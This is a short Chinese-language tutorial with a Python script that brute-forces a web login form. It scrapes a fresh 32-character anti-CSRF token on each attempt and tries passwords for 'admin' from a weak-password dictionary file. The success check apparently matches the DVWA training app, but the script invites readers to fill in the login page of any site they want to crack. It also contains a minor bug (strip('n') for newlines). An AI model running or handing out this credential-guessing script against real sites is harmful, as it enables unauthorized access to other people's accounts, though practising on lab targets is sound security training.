原理:
1、首先获取session值
2、token值会写到服务器的文件中,且每次刷新一下,token值都会发生一次改变,文件中的token值也会发生改变
3、然后再提交账号和密码进行测试
python脚本:
import requests
import re
url = "···················"#填写你需要破解网站的登录页面,并确保你能访问和ping通
def login(password):
session = requests.session()
req=session.get(url)
user_token=re.search("[a-z0-9]{32}",req.text).group(0) #32md5
data={"username":"admin","password":password,"Login":"Login",'user_token':user_token}
req=session.post(url=url,data=data,allow_redirects=True)
html = req.text
return html
with open('渗透测试弱密码.txt') as p:#密码本文件需要和python脚本在同一个文件夹中
passlist =p.readlines()
p.close()
for line in passlist:
line = line.strip("n")
print(line)
if 'File Upload' in login(line):
print( "[* 密码 is %s *]" % line )
break
常用密码:可在网站下载常用密码
密码本下载地址,可选择需要的下载
